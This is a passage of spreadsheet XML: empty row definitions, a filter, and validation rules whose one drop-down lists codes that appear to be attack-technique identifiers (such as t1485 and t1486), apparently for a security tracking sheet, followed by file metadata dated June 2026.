    <row r="863" ht="15.75" customHeight="1" s="42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</row>
    <row r="864" ht="15.75" customHeight="1" s="42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</row>
    <row r="865" ht="15.75" customHeight="1" s="42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</row>
    <row r="866" ht="15.75" customHeight="1" s="42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</row>
    <row r="867" ht="15.75" customHeight="1" s="42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</row>
    <row r="868" ht="15.75" customHeight="1" s="42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</row>
    <row r="869" ht="15.75" customHeight="1" s="42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</row>
    <row r="870" ht="15.75" customHeight="1" s="42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</row>
    <row r="871" ht="15.75" customHeight="1" s="42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</row>
    <row r="872" ht="15.75" customHeight="1" s="42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</row>
    <row r="873" ht="15.75" customHeight="1" s="42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</row>
    <row r="874" ht="15.75" customHeight="1" s="42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</row>
    <row r="875" ht="15.75" customHeight="1" s="42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</row>
    <row r="876" ht="15.75" customHeight="1" s="42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</row>
    <row r="877" ht="15.75" customHeight="1" s="42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</row>
    <row r="878" ht="15.75" customHeight="1" s="42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</row>
    <row r="879" ht="15.75" customHeight="1" s="42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</row>
    <row r="880" ht="15.75" customHeight="1" s="42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</row>
    <row r="881" ht="15.75" customHeight="1" s="42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</row>
    <row r="882" ht="15.75" customHeight="1" s="42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</row>
    <row r="883" ht="15.75" customHeight="1" s="42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</row>
    <row r="884" ht="15.75" customHeight="1" s="42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</row>
    <row r="885" ht="15.75" customHeight="1" s="42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</row>
    <row r="886" ht="15.75" customHeight="1" s="42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</row>
    <row r="887" ht="15.75" customHeight="1" s="42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</row>
    <row r="888" ht="15.75" customHeight="1" s="42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</row>
    <row r="889" ht="15.75" customHeight="1" s="42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</row>
    <row r="890" ht="15.75" customHeight="1" s="42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</row>
    <row r="891" ht="15.75" customHeight="1" s="42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</row>
    <row r="892" ht="15.75" customHeight="1" s="42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</row>
    <row r="893" ht="15.75" customHeight="1" s="42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</row>
    <row r="894" ht="15.75" customHeight="1" s="42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</row>
    <row r="895" ht="15.75" customHeight="1" s="42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</row>
    <row r="896" ht="15.75" customHeight="1" s="42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</row>
    <row r="897" ht="15.75" customHeight="1" s="42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</row>
    <row r="898" ht="15.75" customHeight="1" s="42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</row>
    <row r="899" ht="15.75" customHeight="1" s="42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</row>
    <row r="900" ht="15.75" customHeight="1" s="42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</row>
    <row r="901" ht="15.75" customHeight="1" s="42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</row>
    <row r="902" ht="15.75" customHeight="1" s="42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</row>
    <row r="903" ht="15.75" customHeight="1" s="42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</row>
    <row r="904" ht="15.75" customHeight="1" s="42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</row>
    <row r="905" ht="15.75" customHeight="1" s="42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</row>
    <row r="906" ht="15.75" customHeight="1" s="42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</row>
    <row r="907" ht="15.75" customHeight="1" s="42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</row>
    <row r="908" ht="15.75" customHeight="1" s="42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</row>
    <row r="909" ht="15.75" customHeight="1" s="42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</row>
    <row r="910" ht="15.75" customHeight="1" s="42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</row>
    <row r="911" ht="15.75" customHeight="1" s="42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</row>
    <row r="912" ht="15.75" customHeight="1" s="42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</row>
    <row r="913" ht="15.75" customHeight="1" s="42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</row>
    <row r="914" ht="15.75" customHeight="1" s="42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</row>
    <row r="915" ht="15.75" customHeight="1" s="42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</row>
    <row r="916" ht="15.75" customHeight="1" s="42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</row>
    <row r="917" ht="15.75" customHeight="1" s="42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</row>
    <row r="918" ht="15.75" customHeight="1" s="42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</row>
    <row r="919" ht="15.75" customHeight="1" s="42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</row>
    <row r="920" ht="15.75" customHeight="1" s="42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</row>
    <row r="921" ht="15.75" customHeight="1" s="42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</row>
    <row r="922" ht="15.75" customHeight="1" s="42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</row>
    <row r="923" ht="15.75" customHeight="1" s="42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</row>
    <row r="924" ht="15.75" customHeight="1" s="42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</row>
    <row r="925" ht="15.75" customHeight="1" s="42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</row>
    <row r="926" ht="15.75" customHeight="1" s="42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</row>
    <row r="927" ht="15.75" customHeight="1" s="42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</row>
    <row r="928" ht="15.75" customHeight="1" s="42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</row>
    <row r="929" ht="15.75" customHeight="1" s="42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</row>
    <row r="930" ht="15.75" customHeight="1" s="42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</row>
    <row r="931" ht="15.75" customHeight="1" s="42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</row>
    <row r="932" ht="15.75" customHeight="1" s="42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</row>
    <row r="933" ht="15.75" customHeight="1" s="42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</row>
    <row r="934" ht="15.75" customHeight="1" s="42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</row>
    <row r="935" ht="15.75" customHeight="1" s="42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</row>
    <row r="936" ht="15.75" customHeight="1" s="42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</row>
    <row r="937" ht="15.75" customHeight="1" s="42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</row>
    <row r="938" ht="15.75" customHeight="1" s="42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</row>
    <row r="939" ht="15.75" customHeight="1" s="42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</row>
    <row r="940" ht="15.75" customHeight="1" s="42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</row>
    <row r="941" ht="15.75" customHeight="1" s="42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</row>
    <row r="942" ht="15.75" customHeight="1" s="42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</row>
    <row r="943" ht="15.75" customHeight="1" s="42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</row>
    <row r="944" ht="15.75" customHeight="1" s="42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</row>
    <row r="945" ht="15.75" customHeight="1" s="42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</row>
    <row r="946" ht="15.75" customHeight="1" s="42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</row>
    <row r="947" ht="15.75" customHeight="1" s="42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</row>
    <row r="948" ht="15.75" customHeight="1" s="42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</row>
    <row r="949" ht="15.75" customHeight="1" s="42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</row>
    <row r="950" ht="15.75" customHeight="1" s="42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</row>
    <row r="951" ht="15.75" customHeight="1" s="42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</row>
    <row r="952" ht="15.75" customHeight="1" s="42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</row>
    <row r="953" ht="15.75" customHeight="1" s="42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</row>
    <row r="954" ht="15.75" customHeight="1" s="42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</row>
    <row r="955" ht="15.75" customHeight="1" s="42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</row>
    <row r="956" ht="15.75" customHeight="1" s="42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</row>
    <row r="957" ht="15.75" customHeight="1" s="42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</row>
    <row r="958" ht="15.75" customHeight="1" s="42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</row>
    <row r="959" ht="15.75" customHeight="1" s="42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</row>
    <row r="960" ht="15.75" customHeight="1" s="42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</row>
    <row r="961" ht="15.75" customHeight="1" s="42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</row>
    <row r="962" ht="15.75" customHeight="1" s="42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</row>
    <row r="963" ht="15.75" customHeight="1" s="42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</row>
    <row r="964" ht="15.75" customHeight="1" s="42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</row>
    <row r="965" ht="15.75" customHeight="1" s="42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</row>
    <row r="966" ht="15.75" customHeight="1" s="42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</row>
    <row r="967" ht="15.75" customHeight="1" s="42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</row>
    <row r="968" ht="15.75" customHeight="1" s="42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</row>
    <row r="969" ht="15.75" customHeight="1" s="42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</row>
    <row r="970" ht="15.75" customHeight="1" s="42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</row>
    <row r="971" ht="15.75" customHeight="1" s="42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</row>
    <row r="972" ht="15.75" customHeight="1" s="42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</row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autoFilter ref="A1:K972"/>
  <dataValidations count="3">
    <dataValidation sqref="A2:A95" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"t1485,t1489,t1490,t1070,t1486,t1112,execution,t1496"</formula1>
    </dataValidation>
    <dataValidation sqref="F2:H95" showDropDown="1" showInputMessage="0" showErrorMessage="1" allowBlank="1" type="list">
      <formula1>"TRUE,FALSE"</formula1>
    </dataValidation>
    <dataValidation sqref="J2:J95" showDropDown="1" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="custom">
      <formula1>AND(ISNUMBER(J2),(NOT(OR(NOT(ISERROR(DATEVALUE(J2))), AND(ISNUMBER(J2), LEFT(CELL("format", J2))="D")))))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2026-06-23T23:41:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-27T16:52:03Z</dcterms:modified>
</cp:coreProperties>
</file>